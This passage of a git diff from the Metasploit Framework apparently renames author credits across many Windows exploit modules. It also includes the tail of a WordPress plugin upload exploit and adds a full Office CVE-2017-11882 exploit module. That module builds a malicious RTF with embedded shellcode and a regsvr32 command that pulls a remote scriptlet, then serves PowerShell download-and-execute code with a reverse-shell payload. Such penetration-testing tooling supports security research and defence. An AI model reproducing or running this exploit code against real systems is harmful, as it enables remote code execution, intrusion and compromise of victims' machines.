'wp-mobile-detector', 'resize.php')}?src=#{get_uri}") + + res = send_request_cgi( + 'global' => true, + 'method' => 'GET', + 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php'), + 'vars_get' => {'src' => get_uri} + ) + + if res && res.code == 200 + print_good('Sleeping 5 seconds for payload upload') + register_files_for_cleanup(payload_name) + + Rex.sleep(5) + + print_status("Executing the payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache', payload_name)}") + send_request_cgi( + { + 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache', payload_name), + }) + # wait for callback, without this we exit too fast and miss our shell + Rex.sleep(2) + else + if res.nil? + fail_with(Failure::Unreachable, 'No response from the target') + else + vprint_error("HTTP Status: #{res.code}") + vprint_error("Server returned: #{res.body}") + fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') + end + end + end +end diff --git a/modules/exploits/windows/brightstor/discovery_tcp.rb b/modules/exploits/windows/brightstor/discovery_tcp.rb index 925be50971..576c41d779 100644 --- a/modules/exploits/windows/brightstor/discovery_tcp.rb +++ b/modules/exploits/windows/brightstor/discovery_tcp.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote This module is based on the 'cabrightstor_disco' exploit by HD Moore. }, - 'Author' => [ 'hdm', 'patrick' ], + 'Author' => [ 'hdm', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/brightstor/discovery_udp.rb b/modules/exploits/windows/brightstor/discovery_udp.rb index 924c992925..d376aca463 100644 --- a/modules/exploits/windows/brightstor/discovery_udp.rb +++ b/modules/exploits/windows/brightstor/discovery_udp.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote request is sent to UDP port 41524, triggering a stack buffer overflow. }, - 'Author' => [ 'hdm', 'patrick' ], + 'Author' => [ 'hdm', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/brightstor/message_engine.rb b/modules/exploits/windows/brightstor/message_engine.rb index 52190c0ef7..276210b36c 100644 --- a/modules/exploits/windows/brightstor/message_engine.rb +++ b/modules/exploits/windows/brightstor/message_engine.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code. }, - 'Author' => [ 'MC', 'patrick' ], + 'Author' => [ 'MC', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/brightstor/tape_engine.rb b/modules/exploits/windows/brightstor/tape_engine.rb index 76ec8f5bf6..257710adf6 100644 --- a/modules/exploits/windows/brightstor/tape_engine.rb +++ b/modules/exploits/windows/brightstor/tape_engine.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code. }, - 'Author' => [ 'MC', 'patrick' ], + 'Author' => [ 'MC', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/browser/barcode_ax49.rb b/modules/exploits/windows/browser/barcode_ax49.rb index 723d824519..40760859a6 100644 --- a/modules/exploits/windows/browser/barcode_ax49.rb +++ b/modules/exploits/windows/browser/barcode_ax49.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote method of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'Trancek ', 'patrick' ], + 'Author' => [ 'Trancek ', 'aushack' ], 'References' => [ [ 'EDB', '4094' ], @@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0 English', { 'Ret' => 0x71ab7bfb } ] # jmp esp ws2_32.dll patrickw xpsp0 + [ 'Windows XP SP0 English', { 'Ret' => 0x71ab7bfb } ] # jmp esp ws2_32.dll aushack xpsp0 ], 'DisclosureDate' => 'Jun 22 2007', 'DefaultTarget' => 0)) diff --git a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb index 44bfe234e5..d991c1f2fb 100644 --- a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb +++ b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb @@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - # Tested ok patrickw 20090303 + # Tested ok aushack 20090303 [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ], ], 'DisclosureDate' => 'Jun 6 2007', diff --git a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb index 9792488ea9..8dad48f088 100644 --- a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb +++ b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote is overwritten. }, 'License' => MSF_LICENSE, - 'Author' => 'patrick', + 'Author' => 'aushack', 'References' => [ [ 'CVE', '2006-2086' ], diff --git a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb index 96b65bd1db..aa87e926cc 100644 --- a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb +++ b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => 'patrick', + 'Author' => 'aushack', 'References' => [ [ 'CVE', '2008-1724' ], diff --git a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb index c3ff5b9188..76ccd754cc 100644 --- a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb +++ b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote SEH can be overwritten. }, 'License' => MSF_LICENSE, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'References' => [ [ 'CVE', '2007-3314' ], diff --git a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb index 7d9eca857b..ca7da918ed 100644 --- a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb +++ b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb @@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - # Tested ok patrickw 20090503 + # Tested ok aushack 20090503 [ 'Windows XP SP2 English', { 'Ret' => 0x7c82385d } ], #call esp [ 'Windows XP SP0/1 English', { 'Ret' => 0x71ab7bfb } ], #jmp esp [ 'Windows XP SP2 Spanish', { 'Ret' => 0x7c951eed } ], #jmp esp diff --git a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb index a91c80694e..9651e72307 100644 --- a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb +++ b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb @@ -47,7 +47,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'DefaultOptions' => { - 'EXITFUNC' => 'process' + 'EXITFUNC' => 'process', + 'DisablePayloadHandler' => true }, 'Arch' => [ARCH_X86, ARCH_X64], 'Payload' => @@ -76,7 +77,6 @@ class MetasploitModule < Msf::Exploit::Remote register_advanced_options( [ - OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]), OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']), OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player']) ] diff --git a/modules/exploits/windows/fileformat/destinymediaplayer16.rb b/modules/exploits/windows/fileformat/destinymediaplayer16.rb index aa3f6a2b21..5a9eccf641 100644 --- a/modules/exploits/windows/fileformat/destinymediaplayer16.rb +++ b/modules/exploits/windows/fileformat/destinymediaplayer16.rb @@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - # Tested ok patrickw 20090503 + # Tested ok aushack 20090503 [ 'Destiny Universal', { 'Ret' => 0x00bf9d4d } ], #jmp esp Destiny.exe [ 'Windows XP SP2 Spanish', { 'Ret' => 0x7c951eed } ], #jmp esp ], diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb new file mode 100644 index 0000000000..ec5b951c8d --- /dev/null +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -0,0 +1,315 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ManualRanking + + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::Powershell + include Msf::Exploit::EXE + include Msf::Exploit::FILEFORMAT + + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Office CVE-2017-11882', + 'Description' => %q{ + Module exploits a flaw in how the Equation Editor that + allows an attacker to execute arbitrary code in RTF files without + interaction. The vulnerability is caused by the Equation Editor, + to which fails to properly handle OLE objects in memory. + }, + 'Author' => ['mumbai', 'embedi'], + 'License' => MSF_LICENSE, + 'DisclosureDate' => 'Nov 15 2017', + 'References' => [ + ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'], + ['URL', 'https://github.com/embedi/CVE-2017-11882'] + ], + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => [ + ['Microsoft Office', {} ], + ], + 'DefaultTarget' => 0, + 'Payload' => { + 'DisableNops' => true + }, + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'DefaultOptions' => { + 'EXITFUNC' => 'thread', + 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' + } + )) + + register_options([ + OptString.new("FILENAME", [true, "Filename to save as, or inject", "msf.rtf"]), + OptString.new("FOLDER_PATH", [false, "Path to file to inject", nil]) + ]) + end + + def retrieve_header(filename) + if (not datastore['FOLDER_PATH'].nil?) + path = "#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}" + else + path = nil + end + if (not path.nil?) + if ::File.file?(path) + File.open(path, 'rb') do |fd| + header = fd.read(fd.stat.size).split('{\*\datastore').first + header = header.to_s # otherwise I get nil class... + print_status("Injecting #{path}...") + return header + end + else + header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" + header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" + header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9' + end + else + header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" + header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" + header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9' + end + return header + end + + + + def generate_rtf + header = retrieve_header(datastore['FILENAME']) + object_class = '{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata ' + object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000' + object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff' + object_class << '09000600000000000000000000000100000001000000000000000010000002000' + object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040' + object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0' + object_class << '07400720079000000000000000000000000000000000000000000000000000000' + object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000' + object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce' + object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000003' + object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060' + object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000' + object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045' + object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << "00000300040000000000000000000000000000000000000000000000000000000" + object_class << "000000000000000000000000000000000000000000000000000000000000000\n" + + + shellcode = "\x1c\x00" # 0: 1c 00 sbb al,0x0 + shellcode << "\x00\x00" # 2: 00 00 add BYTE PTR [eax],al + shellcode << "\x02\x00" # 4: 02 00 add al,BYTE PTR [eax] + shellcode << "\x9e" # 6: 9e sahf + shellcode << "\xc4\xa9\x00\x00\x00\x00" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0] + shellcode << "\x00\x00" # d: 00 00 add BYTE PTR [eax],al + shellcode << "\x00\xc8" # f: 00 c8 add al,cl + shellcode << "\xa7" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi] + shellcode << "\\" # 12: 5c pop esp + shellcode << "\x00\xc4" # 13: 00 c4 add ah,al + shellcode << "\xee" # 15: ee out dx,al + shellcode << "[" # 16: 5b pop ebx + shellcode << "\x00\x00" # 17: 00 00 add BYTE PTR [eax],al + shellcode << "\x00\x00" # 19: 00 00 add BYTE PTR [eax],al + shellcode << "\x00\x03" # 1b: 00 03 add BYTE PTR [ebx],al + shellcode << "\x01\x01" # 1d: 01 01 add DWORD PTR [ecx],eax + shellcode << "\x03\n" # 1f: 03 0a add ecx,DWORD PTR [edx] + shellcode << "\n\x01" # 21: 0a 01 or al,BYTE PTR [ecx] + shellcode << "\x08ZZ" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl + shellcode << "\xB8\x44\xEB\x71\x12" # 26: b8 44 eb 71 12 mov eax,0x1271eb44 + shellcode << "\xBA\x78\x56\x34\x12" # 2b: ba 78 56 34 12 mov edx,0x12345678 + shellcode << "\x31\xD0" # 30: 31 d0 xor eax,edx + shellcode << "\x8B\x08" # 32: 8b 08 mov ecx,DWORD PTR [eax] + shellcode << "\x8B\x09" # 34: 8b 09 mov ecx,DWORD PTR [ecx] + shellcode << "\x8B\x09" # 36: 8b 09 mov ecx,DWORD PTR [ecx] + shellcode << "\x66\x83\xC1\x3C" # 38: 66 83 c1 3c add cx,0x3c + shellcode << "\x31\xDB" # 3c: 31 db xor ebx,ebx + shellcode << "\x53" # 3e: 53 push ebx + shellcode << "\x51" # 3f: 51 push ecx + shellcode << "\xBE\x64\x3E\x72\x12" # 40: be 64 3e 72 12 mov esi,0x12723e64 + shellcode << "\x31\xD6" # 45: 31 d6 xor esi,edx + shellcode << "\xFF\x16" # 47: ff 16 call DWORD PTR [esi] + shellcode << "\x53" # 49: 53 push ebx + shellcode << "\x66\x83\xEE\x4C" # 4a: 66 83 ee 4c sub si,0x4c + shellcode << "\xFF\x10" # 4e: ff 10 call DWORD PTR [eax] + shellcode << "\x90" # 50: 90 nop + shellcode << "\x90" # 50: 90 nop + + footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' + footer << '4500710075006100740069006F006E0020004E006100740069007600650000000' + footer << '00000000000000000000000000000000000000000000000000000' + footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000400' + footer << '0000C5000000000000000000000000000000000000000000000000' + footer << '0000000000000000000000000000000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00' + footer << '000000000000000000000000000000000000000000000000000000' + footer << '0000000000000000000000000000000000000000000000000000000000000000' + footer << '000000000000000000000000000000000000000000000000000000' + footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF' + footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000000' + footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000000' + footer << '00000000000000001050000050000000D0000004D45544146494C' + footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C' + footer << '500000002001C0000000000050000000902000000000500000002' + footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF' + footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090' + footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016' + footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131' + footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000' + footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100' + footer << '00030000000000' + "\n" + footer << '}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260' + "\n" + footer << "0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\n" + footer << "0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\n" + footer << "1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\n" + footer << "0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\n" + footer << "0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\n" + footer << "002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\n" + footer << "000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\n" + footer << "0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\n" + footer << "00000000\n" + footer << "}}}\n" + footer << '\par}' + "\n" + + + payload = shellcode + payload += [0x00402114].pack("V") + payload += "\x00" * 2 + payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll" + payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first + payload = header + object_class + payload + footer + payload + end + + + + def gen_psh(url, *method) + ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl + + if method.include? 'string' + download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) + else + # Random filename to use, if there isn't anything set + random = "#{rand_text_alphanumeric 8}.exe" + # Set filename (Use random filename if empty) + filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME'] + + # Set path (Use %TEMP% if empty) + path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}') + + # Join Path and Filename + file = %Q(echo (#{path}+'\\#{filename}')) + + # Generate download PowerShell command + download_string = Rex::Powershell::PshMethods.download_run(url, file) + end + + download_and_run = "#{ignore_cert}#{download_string}" + + # Generate main PowerShell command + return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run) + end + + def on_request_uri(cli, _request) + if _request.raw_uri =~ /\.sct$/ + print_status("Handling request for .sct from #{cli.peerhost}") + payload = gen_psh("#{get_uri}", "string") + data = gen_sct_file(payload) + send_response(cli, data, 'Content-Type' => 'text/plain') + else + print_status("Delivering payload to #{cli.peerhost}...") + p = regenerate_payload(cli) + data = cmd_psh_payload(p.encoded, + payload_instance.arch.first, + remove_comspec: true, + exec_in_place: true + ) + send_response(cli, data, 'Content-Type' => 'application/octet-stream') + end + end + + + def rand_class_id + "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}" + end + + + def gen_sct_file(command) + # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error). + if command == '' + return %{} + # If a command is provided, tell the target system to execute it. + else + return %{} + end + end + + + def primer + file_create(generate_rtf) + end +end diff --git a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb index 6fc3454f39..defdb3b3c4 100644 --- a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb +++ b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote locally as the user. }, 'License' => MSF_LICENSE, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'References' => [ [ 'CVE', '2005-0308' ], diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb index 39b8b166cf..a145c7c5d9 100644 --- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb +++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote This functionality has not been tested in this module. }, 'License' => MSF_LICENSE, - 'Author' => [ 'Trancek ', 'patrick' ], + 'Author' => [ 'Trancek ', 'aushack' ], 'References' => [ [ 'CVE', '2004-0964' ], diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb index e959770970..9b17090505 100644 --- a/modules/exploits/windows/ftp/dreamftp_format.rb +++ b/modules/exploits/windows/ftp/dreamftp_format.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a format string overflow in the BolinTech Dream FTP Server version 1.02. Based on the exploit by SkyLined. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb index f277033c1b..d0ddeeafdc 100644 --- a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote client that is triggered through an excessively long PASV reply command. This module was ported from the original exploit by drG4njubas with minor improvements. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/ftp/sami_ftpd_user.rb b/modules/exploits/windows/ftp/sami_ftpd_user.rb index 4204a62eb2..8b37f12ff1 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_user.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_user.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote payloads. When the server is restarted, it will re-execute the exploit until the logfile is manually deleted via the file system. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'Stance' => Msf::Exploit::Stance::Passive, diff --git a/modules/exploits/windows/ftp/sasser_ftpd_port.rb b/modules/exploits/windows/ftp/sasser_ftpd_port.rb index ab320aef43..84fe672be6 100644 --- a/modules/exploits/windows/ftp/sasser_ftpd_port.rb +++ b/modules/exploits/windows/ftp/sasser_ftpd_port.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits the FTP server component of the Sasser worm. By sending an overly long PORT command the stack can be overwritten. }, - 'Author' => [ '', '', 'patrick' ], + 'Author' => [ '', '', 'aushack' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/windows/games/racer_503beta5.rb b/modules/exploits/windows/games/racer_503beta5.rb index ff545f49f5..f2834618a5 100644 --- a/modules/exploits/windows/games/racer_503beta5.rb +++ b/modules/exploits/windows/games/racer_503beta5.rb @@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - # Tested ok patrickw 20090503 + # Tested ok aushack 20090503 [ 'Fmodex.dll - Universal', { 'Ret' => 0x10073FB7 } ], # jmp esp [ 'Win XP SP2 English', { 'Ret' => 0x77d8af0a } ], [ 'Win XP SP2 Spanish', { 'Ret' => 0x7c951eed } ], diff --git a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb index cd2e6f4fc4..f0624a4f82 100644 --- a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb +++ b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote In addition, it is possible to overwrite EIP by specifying an arbitrary parameter name with an '=' terminator. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'References' => @@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => ['win'], 'Targets' => [ - # patrickw - Tested OK 20100803 w2k IIS5 + # aushack - Tested OK 20100803 w2k IIS5 [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5 # [ 'Windows 2003 Server All - English', 